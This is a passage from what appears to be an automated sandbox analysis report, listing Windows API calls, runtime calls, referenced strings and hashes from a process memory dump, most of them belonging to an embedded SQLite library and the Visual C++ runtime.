                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,00000000,?,?), ref: 04209572
                                                                    • _malloc.LIBCMT ref: 0420957A
                                                                    • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,00000000,?,?), ref: 0420959E
                                                                    • _free.LIBCMT ref: 042095A5
                                                                    • GetVersionExW.KERNEL32(?,?,00000000,?,?), ref: 042095E0
                                                                    • GetDiskFreeSpaceW.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,?), ref: 0420962E
                                                                    • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,?), ref: 04209663
                                                                    • _free.LIBCMT ref: 0420966C
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ByteCharMultiVersionWide_free$_malloc$DiskFreeSpace$FullNamePath
                                                                    • String ID:
                                                                    • API String ID: 2298454362-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: ($API call with %s database connection pointer$d$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7$invalid$misuse at line %d of [%.10s]
                                                                    • API String ID: 2102423945-2789757714
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: :memory:
                                                                    • API String ID: 2102423945-2920599690
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetSystemInfo.KERNEL32(0427EC40,042033B4,?,042636AD), ref: 042099A4
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: InfoSystem
                                                                    • String ID:
                                                                    • API String ID: 31276548-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetVersionExW.KERNEL32 ref: 04208E33
                                                                      • Part of subcall function 04207760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,75145420,0420908D,00000000,00000000,7519F560), ref: 04207770
                                                                      • Part of subcall function 04207760: _malloc.LIBCMT ref: 0420777C
                                                                      • Part of subcall function 04207760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 04207796
                                                                      • Part of subcall function 04207760: _free.LIBCMT ref: 042077A1
                                                                    • GetVersionExW.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 04208EDB
                                                                    • CreateFileW.KERNEL32(00000000,?,00000003,00000000,?,?,00000000), ref: 04208F09
                                                                    • CreateFileA.KERNEL32(00000000,?,00000003,00000000,?,?,00000000), ref: 04208F1C
                                                                    • GetLastError.KERNEL32 ref: 04208F2B
                                                                    • _free.LIBCMT ref: 04208F35
                                                                    Strings
                                                                    • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 04208F7B
                                                                    • cannot open file at line %d of [%.10s], xrefs: 04208F85
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ByteCharCreateFileMultiVersionWide_free$ErrorLast_malloc
                                                                    • String ID: cannot open file at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 3782002744-850067789
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ErrorLast$File$PointerRead_memset
                                                                    • String ID:
                                                                    • API String ID: 1220473449-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0424A8B9
                                                                      • Part of subcall function 04221120: _memset.LIBCMT ref: 0422116B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: ($database schema is locked: %s$statement too long
                                                                    • API String ID: 2102423945-3861767200
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: ($-journal
                                                                    • API String ID: 2102423945-1587918665
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 04214F94
                                                                      • Part of subcall function 0420D4E0: _memset.LIBCMT ref: 0420D514
                                                                    Strings
                                                                    • SQLite format 3, xrefs: 04214F6F
                                                                    • database corruption at line %d of [%.10s], xrefs: 04214E6B
                                                                    • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 04214E61
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: SQLite format 3$database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 2102423945-3910250768
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 0-1231421067
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID:
                                                                    • API String ID: 2102423945-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID:
                                                                    • API String ID: 2102423945-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlAllocateHeap.NTDLL(00000008,042794A0,00000000,?,04268532,00000008,042794A0,00000000,00000000,00000000,?,04268157,00000001,00000214,?,042684E8), ref: 0426A9C5
                                                                      • Part of subcall function 04266CDC: __getptd_noexit.LIBCMT ref: 04266CDC
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: AllocateHeap__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 328603210-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID:
                                                                    • API String ID: 2102423945-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • RtlEncodePointer.NTDLL(00000000,04269841,0427DD38,00000314,00000000,?,?,?,?,?,0426714A,0427DD38,Microsoft Visual C++ Runtime Library,00012010), ref: 04267FF4
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID:
                                                                    • API String ID: 2118026453-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Non-executed Functions

                                                                    APIs
                                                                    • GetLastError.KERNEL32 ref: 04208C5E
                                                                    • GetVersionExW.KERNEL32(?), ref: 04208C82
                                                                    • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 04208CB7
                                                                    • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 04208CF1
                                                                    • _free.LIBCMT ref: 04208D22
                                                                    • LocalFree.KERNEL32(?), ref: 04208D31
                                                                    • _free.LIBCMT ref: 04208D71
                                                                      • Part of subcall function 04207680: AreFileApisANSI.KERNEL32 ref: 04207686
                                                                      • Part of subcall function 04207680: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,00000000,00000000), ref: 0420769E
                                                                      • Part of subcall function 04207680: _malloc.LIBCMT ref: 042076AC
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: FormatMessage_free$ApisByteCharErrorFileFreeLastLocalMultiVersionWide_malloc
                                                                    • String ID: OsError 0x%x (%u)
                                                                    • API String ID: 2308407681-2664311388
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • IsDebuggerPresent.KERNEL32 ref: 04266B3C
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 04266B51
                                                                    • UnhandledExceptionFilter.KERNEL32(042701D0), ref: 04266B5C
                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 04266B78
                                                                    • TerminateProcess.KERNEL32(00000000), ref: 04266B7F
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                    • String ID:
                                                                    • API String ID: 2579439406-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 04218856
                                                                      • Part of subcall function 04212D40: _memset.LIBCMT ref: 04212D6C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 2102423945-1231421067
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetSystemTime.KERNEL32(?), ref: 04209804
                                                                    • GetCurrentProcessId.KERNEL32 ref: 0420982F
                                                                    • GetTickCount.KERNEL32 ref: 04209844
                                                                    • QueryPerformanceCounter.KERNEL32(?), ref: 0420985B
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                    • String ID:
                                                                    • API String ID: 4122616988-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0420BD48
                                                                    • _memset.LIBCMT ref: 0420BEA4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_memset
                                                                    • String ID: 0
                                                                    • API String ID: 121741435-4108050209
                                                                    • Opcode ID: 88fbef420273fdcdb891943dcf64ab854d1f57e328405e75e65e70f735f7f270
                                                                    • Instruction ID: 6726fa35af257e3247463c0a7a73b49d689a628c4669eb012dab8c516577ff98
                                                                    • Opcode Fuzzy Hash: 88fbef420273fdcdb891943dcf64ab854d1f57e328405e75e65e70f735f7f270
                                                                    • Instruction Fuzzy Hash: E37148B0A10A42AFD724CF69C484A6AFBF5BF85200F14866DD54687B82D730F954CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID:
                                                                    • API String ID: 2102423945-0
                                                                    • Opcode ID: fd3884d3ecd8807d883976e5bd2776255642194b9dcd62fa39d450e9f85fe55e
                                                                    • Instruction ID: 5bcc0a4249ee570785ea01ebc74f28c4099fcce57f91bc181437357c689c46b9
                                                                    • Opcode Fuzzy Hash: fd3884d3ecd8807d883976e5bd2776255642194b9dcd62fa39d450e9f85fe55e
                                                                    • Instruction Fuzzy Hash: EA41CDB0724321ABD714CF28C9C065ABBA4BF88B04F04491DED45AB346D779F955CBE2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: %.16g$%02d$%03d$%04d$%06.3f$%lld$W
                                                                    • API String ID: 2102423945-1989508764
                                                                    • Opcode ID: 3d1c3ca6aa0464c943813607c563dbc1a1638a094e1fd6c6c00534f95dca254e
                                                                    • Instruction ID: b9d25929b554efc3562dfd0dffe829e3da27985035ce0c667aa888188f489d41
                                                                    • Opcode Fuzzy Hash: 3d1c3ca6aa0464c943813607c563dbc1a1638a094e1fd6c6c00534f95dca254e
                                                                    • Instruction Fuzzy Hash: 62C128B5B28341EBE710DA14DC84B2B77E5EF84708F048599F9865B2C7F670B940CBA2
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    Strings
                                                                    • %s-shm, xrefs: 04208159
                                                                    • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 04208229
                                                                    • cannot open file at line %d of [%.10s], xrefs: 04208233
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ErrorFileLastUnlock_memset
                                                                    • String ID: %s-shm$cannot open file at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 4009513553-3592428516
                                                                    • Opcode ID: 21a92cb10f47d001e4d64c6706dff4c99b1b7c93b1284c8fa00a01052b746367
                                                                    • Instruction ID: 97690524b6f25f89dc14e9605e5a513d1e83ea9cc3dc25a16e879eb28850300e
                                                                    • Opcode Fuzzy Hash: 21a92cb10f47d001e4d64c6706dff4c99b1b7c93b1284c8fa00a01052b746367
                                                                    • Instruction Fuzzy Hash: F8B12AB1724301AFE750EF29E845B17BBE4AF88718F04852DE949D7282EB74F9448B52
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?,00000000,00000000,7519F560), ref: 04209068
                                                                      • Part of subcall function 04207760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,75145420,0420908D,00000000,00000000,7519F560), ref: 04207770
                                                                      • Part of subcall function 04207760: _malloc.LIBCMT ref: 0420777C
                                                                      • Part of subcall function 04207760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 04207796
                                                                      • Part of subcall function 04207760: _free.LIBCMT ref: 042077A1
                                                                    • GetVersionExW.KERNEL32(?,00000000,00000000,7519F560), ref: 042090BD
                                                                    • DeleteFileW.KERNEL32(00000000,00000000,00000000,7519F560), ref: 042090E1
                                                                    • GetFileAttributesW.KERNEL32(00000000), ref: 042090E4
                                                                    • GetLastError.KERNEL32 ref: 042090F1
                                                                    • Sleep.KERNEL32(00000064), ref: 04209116
                                                                    • DeleteFileA.KERNEL32(00000000,00000000,00000000,7519F560), ref: 04209125
                                                                    • GetFileAttributesA.KERNEL32(00000000), ref: 04209128
                                                                    • GetLastError.KERNEL32 ref: 04209135
                                                                    • Sleep.KERNEL32(00000064), ref: 0420915A
                                                                    • _free.LIBCMT ref: 04209163
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: File$AttributesByteCharDeleteErrorLastMultiSleepVersionWide_free$_malloc
                                                                    • String ID:
                                                                    • API String ID: 876893172-0
                                                                    • Opcode ID: c45013e5b27b2b055d7f46e18cb64cfc6e2ed77ed440daf8006d87beb2504d0e
                                                                    • Instruction ID: 7318dd65bc2d4fed506f3c64b911bc61a5379463056ec21328ff104e4856ddb4
                                                                    • Opcode Fuzzy Hash: c45013e5b27b2b055d7f46e18cb64cfc6e2ed77ed440daf8006d87beb2504d0e
                                                                    • Instruction Fuzzy Hash: 9F416071B102299BCB20AF78A88D69EB3F5FB48324F1145A9D51BD3182D7386E84CF51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0421BDBC
                                                                      • Part of subcall function 0420D4E0: _memset.LIBCMT ref: 0420D514
                                                                    Strings
                                                                    • 2nd reference to page %d, xrefs: 0421BFF0
                                                                    • failed to get page %d, xrefs: 0421C032
                                                                    • %d of %d pages missing from overflow list starting at %d, xrefs: 0421C018
                                                                    • database corruption at line %d of [%.10s], xrefs: 0421BDD0
                                                                    • ed759d5a9edb3bba5f48f243df47be29e3fe8cd7, xrefs: 0421BDC6
                                                                    • invalid page number %d, xrefs: 0421BFD6
                                                                    • freelist leaf count too big on page %d, xrefs: 0421BEB6
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: _memset
                                                                    • String ID: %d of %d pages missing from overflow list starting at %d$2nd reference to page %d$database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7$failed to get page %d$freelist leaf count too big on page %d$invalid page number %d
                                                                    • API String ID: 2102423945-881679150
                                                                    • Opcode ID: d3165e5c9447d90f712f5b1ecddb5acf527cdb99e559b4b5d079ef7194a77f50
                                                                    • Instruction ID: 02418e30693cde0a2a5a32b762f0c4833163a29c2b6e6291f417a78aa7b7d317
                                                                    • Opcode Fuzzy Hash: d3165e5c9447d90f712f5b1ecddb5acf527cdb99e559b4b5d079ef7194a77f50
                                                                    • Instruction Fuzzy Hash: 80B11F71B242169FEB14CF18C880A6ABBF1EF99314F088159FC588B252C371F951CBE1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?,?,00000008), ref: 042089C7
                                                                    • GetTempPathW.KERNEL32(000000E6,?,?,00000008), ref: 042089F0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: PathTempVersion
                                                                    • String ID: %s\etilqs_$etilqs_
                                                                    • API String ID: 261301950-1420421710
                                                                    • Opcode ID: 4b8c100a63598465804fe18c9ace23844d818d571cc553eb9904a266706fe711
                                                                    • Instruction ID: 1f955d5f578b1eefb7382a5eb1bdf418825384e9e3f3a76ff7ea21ec6191da41
                                                                    • Opcode Fuzzy Hash: 4b8c100a63598465804fe18c9ace23844d818d571cc553eb9904a266706fe711
                                                                    • Instruction Fuzzy Hash: 2C715A71B1425A9FE721EB399C44BBB7BE0AF09304F0482E9D455861C3D676AA85CBA0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 04207CD4
                                                                    • Sleep.KERNEL32(00000001), ref: 04207CE2
                                                                    • GetLastError.KERNEL32 ref: 04207CF2
                                                                    • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 04207D33
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: File$ErrorLastLockSleepUnlock
                                                                    • String ID:
                                                                    • API String ID: 3015003838-0
                                                                    • Opcode ID: 5457b762ff31a1e0f124027a12d07fba3cba278589f9d1dfa7786447d0cc7c4c
                                                                    • Instruction ID: af3572fe937014fab06db9f9edc1f23824848cc304f518d7876dfb3c3b356def
                                                                    • Opcode Fuzzy Hash: 5457b762ff31a1e0f124027a12d07fba3cba278589f9d1dfa7786447d0cc7c4c
                                                                    • Instruction Fuzzy Hash: FA418175B21216ABDB218E18E4947BA7BE4EBC4724F24C556ED08DF382D375BD4087D0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 042091FD
                                                                      • Part of subcall function 04207760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,75145420,0420908D,00000000,00000000,7519F560), ref: 04207770
                                                                      • Part of subcall function 04207760: _malloc.LIBCMT ref: 0420777C
                                                                      • Part of subcall function 04207760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 04207796
                                                                      • Part of subcall function 04207760: _free.LIBCMT ref: 042077A1
                                                                    • GetVersionExW.KERNEL32(?), ref: 04209252
                                                                    • GetFileAttributesExW.KERNEL32(00000000,00000000,?), ref: 04209292
                                                                    • _free.LIBCMT ref: 042092E8
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ByteCharMultiVersionWide_free$AttributesFile_malloc
                                                                    • String ID:
                                                                    • API String ID: 2391428990-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • UnlockFileEx.KERNEL32(?,00000000,?,00000000,?), ref: 042085AB
                                                                    • GetLastError.KERNEL32 ref: 042085D6
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ErrorFileLastUnlock
                                                                    • String ID:
                                                                    • API String ID: 3655728120-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetFileSize.KERNEL32(?,00000000), ref: 042087EB
                                                                    • GetLastError.KERNEL32 ref: 042087F8
                                                                    • CreateFileMappingW.KERNEL32(?,00000000,00000004,00000000,?,00000000), ref: 042088B4
                                                                    • MapViewOfFile.KERNEL32(00000000,00000006,00000000,?,?), ref: 042088DC
                                                                    • GetLastError.KERNEL32 ref: 04208906
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0420891C
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: File$ErrorLast$CloseCreateHandleMappingSizeView
                                                                    • String ID:
                                                                    • API String ID: 1258392467-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • __lock.LIBCMT ref: 04266E72
                                                                      • Part of subcall function 0426923C: __mtinitlocknum.LIBCMT ref: 04269252
                                                                      • Part of subcall function 0426923C: __amsg_exit.LIBCMT ref: 0426925E
                                                                      • Part of subcall function 0426923C: EnterCriticalSection.KERNEL32(00000000,00000000,?,04267AC4,00000006,042794A0,00000008,0426655B,00000000,?,?,000003E8,00000000), ref: 04269266
                                                                    • DecodePointer.KERNEL32(04279460,00000020,04266FB5,00000008,00000001,00000000,?,04266FE6,000000FF,?,04269263,00000011,00000000,?,04267AC4,00000006), ref: 04266EAE
                                                                    • DecodePointer.KERNEL32(?,04266FE6,000000FF,?,04269263,00000011,00000000,?,04267AC4,00000006), ref: 04266EBF
                                                                      • Part of subcall function 04267FF2: RtlEncodePointer.NTDLL(00000000,04269841,0427DD38,00000314,00000000,?,?,?,?,?,0426714A,0427DD38,Microsoft Visual C++ Runtime Library,00012010), ref: 04267FF4
                                                                    • DecodePointer.KERNEL32(-00000004,?,04266FE6,000000FF,?,04269263,00000011,00000000,?,04267AC4,00000006), ref: 04266EE5
                                                                    • DecodePointer.KERNEL32(?,04266FE6,000000FF,?,04269263,00000011,00000000,?,04267AC4,00000006), ref: 04266EF8
                                                                    • DecodePointer.KERNEL32(?,04266FE6,000000FF,?,04269263,00000011,00000000,?,04267AC4,00000006), ref: 04266F02
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Pointer$Decode$CriticalEncodeEnterSection__amsg_exit__lock__mtinitlocknum
                                                                    • String ID:
                                                                    • API String ID: 2005412495-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • __getptd.LIBCMT ref: 0426A446
                                                                      • Part of subcall function 042681A5: __getptd_noexit.LIBCMT ref: 042681A8
                                                                      • Part of subcall function 042681A5: __amsg_exit.LIBCMT ref: 042681B5
                                                                    • __amsg_exit.LIBCMT ref: 0426A466
                                                                    • __lock.LIBCMT ref: 0426A476
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 0426A493
                                                                    • _free.LIBCMT ref: 0426A4A6
                                                                    • InterlockedIncrement.KERNEL32(04411608), ref: 0426A4BE
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                    • String ID:
                                                                    • API String ID: 3470314060-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: database corruption at line %d of [%.10s]$ed759d5a9edb3bba5f48f243df47be29e3fe8cd7
                                                                    • API String ID: 0-1231421067
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • UnmapViewOfFile.KERNEL32(0427EAE8), ref: 0420801B
                                                                    • CloseHandle.KERNEL32(00000000), ref: 04208028
                                                                    • CloseHandle.KERNEL32(?), ref: 0420803C
                                                                    • Sleep.KERNEL32(00000064), ref: 0420804A
                                                                    • CloseHandle.KERNEL32(?), ref: 04208054
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: CloseHandle$FileSleepUnmapView
                                                                    • String ID:
                                                                    • API String ID: 888976869-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 042078F8
                                                                    • GetLastError.KERNEL32 ref: 04207909
                                                                    • GetLastError.KERNEL32 ref: 0420790F
                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0420792C
                                                                    • GetLastError.KERNEL32 ref: 04207952
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ErrorLast$File$PointerWrite
                                                                    • String ID:
                                                                    • API String ID: 3440492293-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetVersionExW.KERNEL32(?), ref: 042096E9
                                                                      • Part of subcall function 04207760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,00000114,75145420,0420908D,00000000,00000000,7519F560), ref: 04207770
                                                                      • Part of subcall function 04207760: _malloc.LIBCMT ref: 0420777C
                                                                      • Part of subcall function 04207760: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000), ref: 04207796
                                                                      • Part of subcall function 04207760: _free.LIBCMT ref: 042077A1
                                                                    • GetVersionExW.KERNEL32(?), ref: 0420973F
                                                                    • LoadLibraryW.KERNEL32(00000000), ref: 04209759
                                                                    • LoadLibraryA.KERNEL32(00000000), ref: 04209761
                                                                    • _free.LIBCMT ref: 0420976A
                                                                    Memory Dump Source
                                                                    • Source File: 00000011.00000003.386179990.0000000004200000.00000040.00000001.sdmp, Offset: 04200000, based on PE: true
                                                                    Similarity
                                                                    • API ID: ByteCharLibraryLoadMultiVersionWide_free$_malloc
